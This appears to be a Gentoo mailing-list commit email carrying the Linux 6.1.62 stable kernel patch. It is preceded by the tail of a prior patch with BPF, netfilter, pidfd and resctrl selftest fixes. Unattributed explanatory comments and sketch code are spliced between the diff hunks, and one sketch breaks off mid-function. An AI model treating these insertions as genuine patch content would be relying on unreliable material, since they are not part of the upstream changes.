++++ b/tools/perf/util/machine.c
+@@ -2555,16 +2555,18 @@ static int lbr_callchain_add_lbr_ip(struct thread *thread,
+ 		save_lbr_cursor_node(thread, cursor, i);
+ 	}
+ 
+-	/* Add LBR ip from first entries.to */
+-	ip = entries[0].to;
+-	flags = &entries[0].flags;
+-	*branch_from = entries[0].from;
+-	err = add_callchain_ip(thread, cursor, parent,
+-			       root_al, &cpumode, ip,
+-			       true, flags, NULL,
+-			       *branch_from);
+-	if (err)
+-		return err;
++	if (lbr_nr > 0) {
++		/* Add LBR ip from first entries.to */
++		ip = entries[0].to;
++		flags = &entries[0].flags;
++		*branch_from = entries[0].from;
++		err = add_callchain_ip(thread, cursor, parent,
++				root_al, &cpumode, ip,
++				true, flags, NULL,
++				*branch_from);
++		if (err)
++			return err;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/bpf/prog_tests/tailcalls.c b/tools/testing/selftests/bpf/prog_tests/tailcalls.c
+index 58fe2c586ed76..09c189761926c 100644
+--- a/tools/testing/selftests/bpf/prog_tests/tailcalls.c
++++ b/tools/testing/selftests/bpf/prog_tests/tailcalls.c
+@@ -271,11 +271,11 @@ static void test_tailcall_count(const char *which)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	err = bpf_map_lookup_elem(data_fd, &i, &val);
+@@ -352,11 +352,11 @@ static void test_tailcall_4(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	for (i = 0; i < bpf_map__max_entries(prog_array); i++) {
+ 		snprintf(prog_name, sizeof(prog_name), "classifier_%d", i);
+@@ -442,11 +442,11 @@ static void test_tailcall_5(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	for (i = 0; i < bpf_map__max_entries(prog_array); i++) {
+ 		snprintf(prog_name, sizeof(prog_name), "classifier_%d", i);
+@@ -631,11 +631,11 @@ static void test_tailcall_bpf2bpf_2(void)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	err = bpf_map_lookup_elem(data_fd, &i, &val);
+@@ -805,11 +805,11 @@ static void test_tailcall_bpf2bpf_4(bool noise)
+ 
+ 	data_map = bpf_object__find_map_by_name(obj, "tailcall.bss");
+ 	if (CHECK_FAIL(!data_map || !bpf_map__is_internal(data_map)))
+-		return;
++		goto out;
+ 
+ 	data_fd = bpf_map__fd(data_map);
+-	if (CHECK_FAIL(map_fd < 0))
+-		return;
++	if (CHECK_FAIL(data_fd < 0))
++		goto out;
+ 
+ 	i = 0;
+ 	val.noise = noise;
+@@ -872,7 +872,7 @@ static void test_tailcall_bpf2bpf_6(void)
+ 	ASSERT_EQ(topts.retval, 0, "tailcall retval");
+ 
+ 	data_fd = bpf_map__fd(obj->maps.bss);
+-	if (!ASSERT_GE(map_fd, 0, "bss map fd"))
++	if (!ASSERT_GE(data_fd, 0, "bss map fd"))
+ 		goto out;
+ 
+ 	i = 0;
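
All of these hunks repair the same two slips: testing the stale map_fd instead of the data_fd that was just fetched, and returning early after the BPF object is loaded instead of jumping to the cleanup label. A minimal, hypothetical shape of the intended pattern (the two helpers are placeholders, not selftest APIs):

#include <bpf/libbpf.h>

/* hypothetical stand-ins for the selftest's load/lookup plumbing */
int load_object(struct bpf_object **obj);
int object_data_fd(struct bpf_object *obj);

static void test_shape(void)
{
	struct bpf_object *obj = NULL;
	int data_fd;

	if (load_object(&obj))
		return;		/* nothing live yet, plain return is fine */

	data_fd = object_data_fd(obj);
	if (data_fd < 0)
		goto out;	/* obj is live: go through cleanup */

	/* ... assertions against data_fd ... */
out:
	bpf_object__close(obj);
}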
+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index dfe3d287f01d2..0d705fdcf3b76 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -2013,7 +2013,7 @@ run_test() {
+ 	case $ret in
+ 		0)
+ 			all_skipped=false
+-			[ $exitcode=$ksft_skip ] && exitcode=0
++			[ $exitcode -eq $ksft_skip ] && exitcode=0
+ 		;;
+ 		$ksft_skip)
+ 			[ $all_skipped = true ] && exitcode=$ksft_skip
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 321db8850da00..bced422b78f72 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -6,13 +6,14 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	nft_concat_range.sh nft_conntrack_helper.sh \
+ 	nft_queue.sh nft_meta.sh nf_nat_edemux.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+-	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh
++	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh \
++	conntrack_sctp_collision.sh xt_string.sh
+ 
+ HOSTPKG_CONFIG := pkg-config
+ 
+ CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
+ LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
+ 
+-TEST_GEN_FILES =  nf-queue connect_close audit_logread
++TEST_GEN_FILES =  nf-queue connect_close audit_logread sctp_collision
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh b/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh
+new file mode 100755
+index 0000000000000..a924e595cfd8b
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/conntrack_sctp_collision.sh
+@@ -0,0 +1,89 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Test for the SCTP collision scenario shown below:
++#
++#   14:35:47.655279 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [INIT] [init tag: 2017837359]
++#   14:35:48.353250 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [INIT] [init tag: 1187206187]
++#   14:35:48.353275 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [INIT ACK] [init tag: 2017837359]
++#   14:35:48.353283 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [COOKIE ECHO]
++#   14:35:48.353977 IP CLIENT_IP.PORT > SERVER_IP.PORT: sctp (1) [COOKIE ACK]
++#   14:35:48.855335 IP SERVER_IP.PORT > CLIENT_IP.PORT: sctp (1) [INIT ACK] [init tag: 164579970]
++#
++# TOPO: SERVER_NS (link0)<--->(link1) ROUTER_NS (link2)<--->(link3) CLIENT_NS
++
++CLIENT_NS=$(mktemp -u client-XXXXXXXX)
++CLIENT_IP="198.51.200.1"
++CLIENT_PORT=1234
++
++SERVER_NS=$(mktemp -u server-XXXXXXXX)
++SERVER_IP="198.51.100.1"
++SERVER_PORT=1234
++
++ROUTER_NS=$(mktemp -u router-XXXXXXXX)
++CLIENT_GW="198.51.200.2"
++SERVER_GW="198.51.100.2"
++
++# setup the topo
++setup() {
++	ip net add $CLIENT_NS
++	ip net add $SERVER_NS
++	ip net add $ROUTER_NS
++	ip -n $SERVER_NS link add link0 type veth peer name link1 netns $ROUTER_NS
++	ip -n $CLIENT_NS link add link3 type veth peer name link2 netns $ROUTER_NS
++
++	ip -n $SERVER_NS link set link0 up
++	ip -n $SERVER_NS addr add $SERVER_IP/24 dev link0
++	ip -n $SERVER_NS route add $CLIENT_IP dev link0 via $SERVER_GW
++
++	ip -n $ROUTER_NS link set link1 up
++	ip -n $ROUTER_NS link set link2 up
++	ip -n $ROUTER_NS addr add $SERVER_GW/24 dev link1
++	ip -n $ROUTER_NS addr add $CLIENT_GW/24 dev link2
++	ip net exec $ROUTER_NS sysctl -wq net.ipv4.ip_forward=1
++
++	ip -n $CLIENT_NS link set link3 up
++	ip -n $CLIENT_NS addr add $CLIENT_IP/24 dev link3
++	ip -n $CLIENT_NS route add $SERVER_IP dev link3 via $CLIENT_GW
++
++	# simulate the delay on OVS upcall by setting up a delay for INIT_ACK with
++	# tc on $SERVER_NS side
++	tc -n $SERVER_NS qdisc add dev link0 root handle 1: htb
++	tc -n $SERVER_NS class add dev link0 parent 1: classid 1:1 htb rate 100mbit
++	tc -n $SERVER_NS filter add dev link0 parent 1: protocol ip u32 match ip protocol 132 \
++		0xff match u8 2 0xff at 32 flowid 1:1
++	tc -n $SERVER_NS qdisc add dev link0 parent 1:1 handle 10: netem delay 1200ms
++
++	# simulate the ctstate check on OVS nf_conntrack
++	ip net exec $ROUTER_NS iptables -A FORWARD -m state --state INVALID,UNTRACKED -j DROP
++	ip net exec $ROUTER_NS iptables -A INPUT -p sctp -j DROP
++
++	# use a smaller number for assoc's max_retrans to reproduce the issue
++	modprobe sctp
++	ip net exec $CLIENT_NS sysctl -wq net.sctp.association_max_retrans=3
++}
++
++cleanup() {
++	ip net exec $CLIENT_NS pkill sctp_collision >/dev/null 2>&1
++	ip net exec $SERVER_NS pkill sctp_collision >/dev/null 2>&1
++	ip net del "$CLIENT_NS"
++	ip net del "$SERVER_NS"
++	ip net del "$ROUTER_NS"
++}
++
++do_test() {
++	ip net exec $SERVER_NS ./sctp_collision server \
++		$SERVER_IP $SERVER_PORT $CLIENT_IP $CLIENT_PORT &
++	ip net exec $CLIENT_NS ./sctp_collision client \
++		$CLIENT_IP $CLIENT_PORT $SERVER_IP $SERVER_PORT
++}
++
++# NOTE: one way to work around the issue is set a smaller hb_interval
++# ip net exec $CLIENT_NS sysctl -wq net.sctp.hb_interval=3500
++
++# run the test case
++trap cleanup EXIT
++setup && \
++echo "Test for SCTP Collision in nf_conntrack:" && \
++do_test && echo "PASS!"
++exit $?
+diff --git a/tools/testing/selftests/netfilter/sctp_collision.c b/tools/testing/selftests/netfilter/sctp_collision.c
+new file mode 100644
+index 0000000000000..21bb1cfd8a856
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/sctp_collision.c
+@@ -0,0 +1,99 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++#include <unistd.h>
++#include <arpa/inet.h>
++
++int main(int argc, char *argv[])
++{
++	struct sockaddr_in saddr = {}, daddr = {};
++	int sd, ret, len = sizeof(daddr);
++	struct timeval tv = {25, 0};
++	char buf[] = "hello";
++
++	if (argc != 6 || (strcmp(argv[1], "server") && strcmp(argv[1], "client"))) {
++		printf("%s <server|client> <LOCAL_IP> <LOCAL_PORT> <REMOTE_IP> <REMOTE_PORT>\n",
++		       argv[0]);
++		return -1;
++	}
++
++	sd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
++	if (sd < 0) {
++		printf("Failed to create sd\n");
++		return -1;
++	}
++
++	saddr.sin_family = AF_INET;
++	saddr.sin_addr.s_addr = inet_addr(argv[2]);
++	saddr.sin_port = htons(atoi(argv[3]));
++
++	ret = bind(sd, (struct sockaddr *)&saddr, sizeof(saddr));
++	if (ret < 0) {
++		printf("Failed to bind to address\n");
++		goto out;
++	}
++
++	ret = listen(sd, 5);
++	if (ret < 0) {
++		printf("Failed to listen on port\n");
++		goto out;
++	}
++
++	daddr.sin_family = AF_INET;
++	daddr.sin_addr.s_addr = inet_addr(argv[4]);
++	daddr.sin_port = htons(atoi(argv[5]));
++
++	/* make test shorter than 25s */
++	ret = setsockopt(sd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
++	if (ret < 0) {
++		printf("Failed to setsockopt SO_RCVTIMEO\n");
++		goto out;
++	}
++
++	if (!strcmp(argv[1], "server")) {
++		sleep(1); /* wait a bit for client's INIT */
++		ret = connect(sd, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to connect to peer\n");
++			goto out;
++		}
++		ret = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *)&daddr, &len);
++		if (ret < 0) {
++			printf("Failed to recv msg %d\n", ret);
++			goto out;
++		}
++		ret = sendto(sd, buf, strlen(buf) + 1, 0, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to send msg %d\n", ret);
++			goto out;
++		}
++		printf("Server: sent! %d\n", ret);
++	}
++
++	if (!strcmp(argv[1], "client")) {
++		usleep(300000); /* wait a bit for server's listening */
++		ret = connect(sd, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to connect to peer\n");
++			goto out;
++		}
++		sleep(1); /* wait a bit for server's delayed INIT_ACK to reproduce the issue */
++		ret = sendto(sd, buf, strlen(buf) + 1, 0, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to send msg %d\n", ret);
++			goto out;
++		}
++		ret = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *)&daddr, &len);
++		if (ret < 0) {
++			printf("Failed to recv msg %d\n", ret);
++			goto out;
++		}
++		printf("Client: rcvd! %d\n", ret);
++	}
++	ret = 0;
++out:
++	close(sd);
++	return ret;
++}
+diff --git a/tools/testing/selftests/netfilter/xt_string.sh b/tools/testing/selftests/netfilter/xt_string.sh
+new file mode 100755
+index 0000000000000..1802653a47287
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/xt_string.sh
+@@ -0,0 +1,128 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++
++# return code to signal skipped test
++ksft_skip=4
++rc=0
++
++if ! iptables --version >/dev/null 2>&1; then
++	echo "SKIP: Test needs iptables"
++	exit $ksft_skip
++fi
++if ! ip -V >/dev/null 2>&1; then
++	echo "SKIP: Test needs iproute2"
++	exit $ksft_skip
++fi
++if ! nc -h >/dev/null 2>&1; then
++	echo "SKIP: Test needs netcat"
++	exit $ksft_skip
++fi
++
++pattern="foo bar baz"
++patlen=11
++hdrlen=$((20 + 8)) # IPv4 + UDP
++ns="ns-$(mktemp -u XXXXXXXX)"
++trap 'ip netns del $ns' EXIT
++ip netns add "$ns"
++ip -net "$ns" link add d0 type dummy
++ip -net "$ns" link set d0 up
++ip -net "$ns" addr add 10.1.2.1/24 dev d0
++
++#ip netns exec "$ns" tcpdump -npXi d0 &
++#tcpdump_pid=$!
++#trap 'kill $tcpdump_pid; ip netns del $ns' EXIT
++
++add_rule() { # (alg, from, to)
++	ip netns exec "$ns" \
++		iptables -A OUTPUT -o d0 -m string \
++			--string "$pattern" --algo $1 --from $2 --to $3
++}
++showrules() { # ()
++	ip netns exec "$ns" iptables -v -S OUTPUT | grep '^-A'
++}
++zerorules() {
++	ip netns exec "$ns" iptables -Z OUTPUT
++}
++countrule() { # (pattern)
++	showrules | grep -c -- "$*"
++}
++send() { # (offset)
++	( for ((i = 0; i < $1 - $hdrlen; i++)); do
++		printf " "
++	  done
++	  printf "$pattern"
++	) | ip netns exec "$ns" nc -w 1 -u 10.1.2.2 27374
++}
++
++add_rule bm 1000 1500
++add_rule bm 1400 1600
++add_rule kmp 1000 1500
++add_rule kmp 1400 1600
++
++zerorules
++send 0
++send $((1000 - $patlen))
++if [ $(countrule -c 0 0) -ne 4 ]; then
++	echo "FAIL: rules match data before --from"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1000
++send $((1400 - $patlen))
++if [ $(countrule -c 2) -ne 2 ]; then
++	echo "FAIL: only two rules should match at low offset"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1500 - $patlen))
++if [ $(countrule -c 1) -ne 4 ]; then
++	echo "FAIL: all rules should match at end of packet"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1495
++if [ $(countrule -c 1) -ne 1 ]; then
++	echo "FAIL: only kmp with proper --to should match pattern spanning fragments"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1500
++if [ $(countrule -c 1) -ne 2 ]; then
++	echo "FAIL: two rules should match pattern at start of second fragment"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1600 - $patlen))
++if [ $(countrule -c 1) -ne 2 ]; then
++	echo "FAIL: two rules should match pattern at end of largest --to"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1600 - $patlen + 1))
++if [ $(countrule -c 1) -ne 0 ]; then
++	echo "FAIL: no rules should match pattern extending largest --to"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1600
++if [ $(countrule -c 1) -ne 0 ]; then
++	echo "FAIL: no rule should match pattern past largest --to"
++	showrules
++	((rc--))
++fi
++
++exit $rc
+diff --git a/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c b/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
+index 3fd8e903118f5..3bc46d6151f44 100644
+--- a/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
++++ b/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
+@@ -62,7 +62,7 @@ static void error_report(struct error *err, const char *test_name)
+ 		break;
+ 
+ 	case PIDFD_PASS:
+-		ksft_test_result_pass("%s test: Passed\n");
++		ksft_test_result_pass("%s test: Passed\n", test_name);
+ 		break;
+ 
+ 	default:
+diff --git a/tools/testing/selftests/pidfd/pidfd_test.c b/tools/testing/selftests/pidfd/pidfd_test.c
+index e2dd4ed849846..cf4f3174c83e0 100644
+--- a/tools/testing/selftests/pidfd/pidfd_test.c
++++ b/tools/testing/selftests/pidfd/pidfd_test.c
+@@ -380,13 +380,13 @@ static int test_pidfd_send_signal_syscall_support(void)
+ 
+ static void *test_pidfd_poll_exec_thread(void *priv)
+ {
+-	ksft_print_msg("Child Thread: starting. pid %d tid %d ; and sleeping\n",
++	ksft_print_msg("Child Thread: starting. pid %d tid %ld ; and sleeping\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	ksft_print_msg("Child Thread: doing exec of sleep\n");
+ 
+ 	execl("/bin/sleep", "sleep", str(CHILD_THREAD_MIN_WAIT), (char *)NULL);
+ 
+-	ksft_print_msg("Child Thread: DONE. pid %d tid %d\n",
++	ksft_print_msg("Child Thread: DONE. pid %d tid %ld\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	return NULL;
+ }
+@@ -426,7 +426,7 @@ static int child_poll_exec_test(void *args)
+ {
+ 	pthread_t t1;
+ 
+-	ksft_print_msg("Child (pidfd): starting. pid %d tid %d\n", getpid(),
++	ksft_print_msg("Child (pidfd): starting. pid %d tid %ld\n", getpid(),
+ 			syscall(SYS_gettid));
+ 	pthread_create(&t1, NULL, test_pidfd_poll_exec_thread, NULL);
+ 	/*
+@@ -479,10 +479,10 @@ static void test_pidfd_poll_exec(int use_waitpid)
+ 
+ static void *test_pidfd_poll_leader_exit_thread(void *priv)
+ {
+-	ksft_print_msg("Child Thread: starting. pid %d tid %d ; and sleeping\n",
++	ksft_print_msg("Child Thread: starting. pid %d tid %ld ; and sleeping\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	sleep(CHILD_THREAD_MIN_WAIT);
+-	ksft_print_msg("Child Thread: DONE. pid %d tid %d\n", getpid(), syscall(SYS_gettid));
++	ksft_print_msg("Child Thread: DONE. pid %d tid %ld\n", getpid(), syscall(SYS_gettid));
+ 	return NULL;
+ }
+ 
+@@ -491,7 +491,7 @@ static int child_poll_leader_exit_test(void *args)
+ {
+ 	pthread_t t1, t2;
+ 
+-	ksft_print_msg("Child: starting. pid %d tid %d\n", getpid(), syscall(SYS_gettid));
++	ksft_print_msg("Child: starting. pid %d tid %ld\n", getpid(), syscall(SYS_gettid));
+ 	pthread_create(&t1, NULL, test_pidfd_poll_leader_exit_thread, NULL);
+ 	pthread_create(&t2, NULL, test_pidfd_poll_leader_exit_thread, NULL);
+ 
+diff --git a/tools/testing/selftests/resctrl/resctrl_tests.c b/tools/testing/selftests/resctrl/resctrl_tests.c
+index df0d8d8526fc6..4418155a879b9 100644
+--- a/tools/testing/selftests/resctrl/resctrl_tests.c
++++ b/tools/testing/selftests/resctrl/resctrl_tests.c
+@@ -228,9 +228,14 @@ int main(int argc, char **argv)
+ 		return ksft_exit_skip("Not running as root. Skipping...\n");
+ 
+ 	if (has_ben) {
++		if (argc - ben_ind >= BENCHMARK_ARGS)
++			ksft_exit_fail_msg("Too long benchmark command.\n");
++
+ 		/* Extract benchmark command from command line. */
+ 		for (i = ben_ind; i < argc; i++) {
+ 			benchmark_cmd[i - ben_ind] = benchmark_cmd_area[i];
++			if (strlen(argv[i]) >= BENCHMARK_ARG_SIZE)
++				ksft_exit_fail_msg("Too long benchmark command argument.\n");
+ 			sprintf(benchmark_cmd[i - ben_ind], "%s", argv[i]);
+ 		}
+ 		benchmark_cmd[ben_count] = NULL;
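
A hypothetical condensation of the bounds checks added above: both the number of arguments and each argument's length are validated before anything is copied into the fixed-size benchmark_cmd storage. The limits and helper name below are illustrative, not the selftest's actual values.

#include <stdio.h>
#include <string.h>

#define BENCHMARK_ARGS		64	/* illustrative limits */
#define BENCHMARK_ARG_SIZE	256

static int copy_benchmark_cmd(char *dst[BENCHMARK_ARGS],
			      char area[BENCHMARK_ARGS][BENCHMARK_ARG_SIZE],
			      int argc, char **argv)
{
	int i;

	if (argc >= BENCHMARK_ARGS)
		return -1;		/* no room for the NULL terminator */

	for (i = 0; i < argc; i++) {
		if (strlen(argv[i]) >= BENCHMARK_ARG_SIZE)
			return -1;	/* would truncate or overflow */
		snprintf(area[i], BENCHMARK_ARG_SIZE, "%s", argv[i]);
		dst[i] = area[i];
	}
	dst[i] = NULL;
	return 0;
}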


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-08 14:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-08 14:02 UTC (permalink / raw
  To: gentoo-commits

commit:     b6b4af36aa8079ef0c7c6cf9c05b3c1a59be66e0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Nov  8 14:02:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Nov  8 14:02:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b6b4af36

Linux patch 6.1.62

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1061_linux-6.1.62.patch | 1798 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1802 insertions(+)

diff --git a/0000_README b/0000_README
index 78a774ef..3a96d6b9 100644
--- a/0000_README
+++ b/0000_README
@@ -287,6 +287,10 @@ Patch:  1060_linux-6.1.61.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.61
 
+Patch:  1061_linux-6.1.62.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.62
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1061_linux-6.1.62.patch b/1061_linux-6.1.62.patch
new file mode 100644
index 00000000..9c94ec46
--- /dev/null
+++ b/1061_linux-6.1.62.patch
@@ -0,0 +1,1798 @@
+diff --git a/Makefile b/Makefile
+index 635474f38aaa9..2e7bc3cc1c177 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 61
++SUBLEVEL = 62
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index c7e9c96719fa3..f42a3be5f28d7 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -68,11 +68,11 @@ void copy_user_highpage(struct page *to, struct page *from,
+ {
+ 	void *vfrom, *vto;
+ 
+-	vto = kmap_atomic(to);
+-	vfrom = kmap_atomic(from);
++	vfrom = kmap_local_page(from);
++	vto = kmap_local_page(to);
+ 	copy_page(vto, vfrom);
+-	kunmap_atomic(vfrom);
+-	kunmap_atomic(vto);
++	kunmap_local(vfrom);
++	kunmap_local(vto);
+ 	/* Make sure this page is cleared on other CPU's too before using it */
+ 	smp_wmb();
+ }
+@@ -228,6 +228,7 @@ pgd_t swapper_pg_dir[_PTRS_PER_PGD] __section(".bss..swapper_pg_dir");
+ pgd_t invalid_pg_dir[_PTRS_PER_PGD] __page_aligned_bss;
+ #ifndef __PAGETABLE_PUD_FOLDED
+ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
++EXPORT_SYMBOL(invalid_pud_table);
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+diff --git a/arch/powerpc/kernel/head_85xx.S b/arch/powerpc/kernel/head_85xx.S
+index 52c0ab416326a..0e16aea7853b8 100644
+--- a/arch/powerpc/kernel/head_85xx.S
++++ b/arch/powerpc/kernel/head_85xx.S
+@@ -394,7 +394,7 @@ interrupt_base:
+ #ifdef CONFIG_PPC_FPU
+ 	FP_UNAVAILABLE_EXCEPTION
+ #else
+-	EXCEPTION(0x0800, FP_UNAVAIL, FloatingPointUnavailable, unknown_exception)
++	EXCEPTION(0x0800, FP_UNAVAIL, FloatingPointUnavailable, emulation_assist_interrupt)
+ #endif
+ 
+ 	/* System Call Interrupt */
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index efb301a4987ca..59b4ac57bfaf7 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -946,6 +946,8 @@ void __init setup_arch(char **cmdline_p)
+ 
+ 	/* Parse memory topology */
+ 	mem_topology_setup();
++	/* Set max_mapnr before paging_init() */
++	set_max_mapnr(max_pfn);
+ 
+ 	/*
+ 	 * Release secondary cpus out of their spinloops at 0x60 now that
+diff --git a/arch/powerpc/mm/mem.c b/arch/powerpc/mm/mem.c
+index 84d171953ba44..c7599b1737099 100644
+--- a/arch/powerpc/mm/mem.c
++++ b/arch/powerpc/mm/mem.c
+@@ -288,7 +288,6 @@ void __init mem_init(void)
+ #endif
+ 
+ 	high_memory = (void *) __va(max_low_pfn * PAGE_SIZE);
+-	set_max_mapnr(max_pfn);
+ 
+ 	kasan_late_init();
+ 
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index c871a6d6364ca..4194aa4c5f0e0 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -822,8 +822,7 @@ void svm_set_x2apic_msr_interception(struct vcpu_svm *svm, bool intercept)
+ 	if (intercept == svm->x2avic_msrs_intercepted)
+ 		return;
+ 
+-	if (avic_mode != AVIC_MODE_X2 ||
+-	    !apic_x2apic_mode(svm->vcpu.arch.apic))
++	if (avic_mode != AVIC_MODE_X2)
+ 		return;
+ 
+ 	for (i = 0; i < MAX_DIRECT_ACCESS_MSRS; i++) {
+diff --git a/drivers/dma/ste_dma40.c b/drivers/dma/ste_dma40.c
+index 3b09fdc507e04..594b016e76efc 100644
+--- a/drivers/dma/ste_dma40.c
++++ b/drivers/dma/ste_dma40.c
+@@ -3697,6 +3697,7 @@ static int __init d40_probe(struct platform_device *pdev)
+ 		regulator_disable(base->lcpa_regulator);
+ 		regulator_put(base->lcpa_regulator);
+ 	}
++	pm_runtime_disable(base->dev);
+ 
+ 	kfree(base->lcla_pool.alloc_map);
+ 	kfree(base->lookup_log_chans);
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index b43e5e6ddaf6e..b7c0e8cc0764f 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -245,9 +245,13 @@ static __init int efivar_ssdt_load(void)
+ 		if (status == EFI_NOT_FOUND) {
+ 			break;
+ 		} else if (status == EFI_BUFFER_TOO_SMALL) {
+-			name = krealloc(name, name_size, GFP_KERNEL);
+-			if (!name)
++			efi_char16_t *name_tmp =
++				krealloc(name, name_size, GFP_KERNEL);
++			if (!name_tmp) {
++				kfree(name);
+ 				return -ENOMEM;
++			}
++			name = name_tmp;
+ 			continue;
+ 		}
+ 
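
The defect fixed here is the classic krealloc() anti-pattern: writing the result straight back to the pointer being grown drops the only reference to the old buffer when the allocation fails. A sketch of the safe shape, with an illustrative helper name:

#include <linux/errno.h>
#include <linux/slab.h>

/* Hypothetical helper: grow *bufp in place without leaking on failure. */
static int grow_buffer(void **bufp, size_t new_size)
{
	void *tmp = krealloc(*bufp, new_size, GFP_KERNEL);

	if (!tmp) {
		kfree(*bufp);	/* krealloc() left the old buffer alive */
		*bufp = NULL;
		return -ENOMEM;
	}
	*bufp = tmp;
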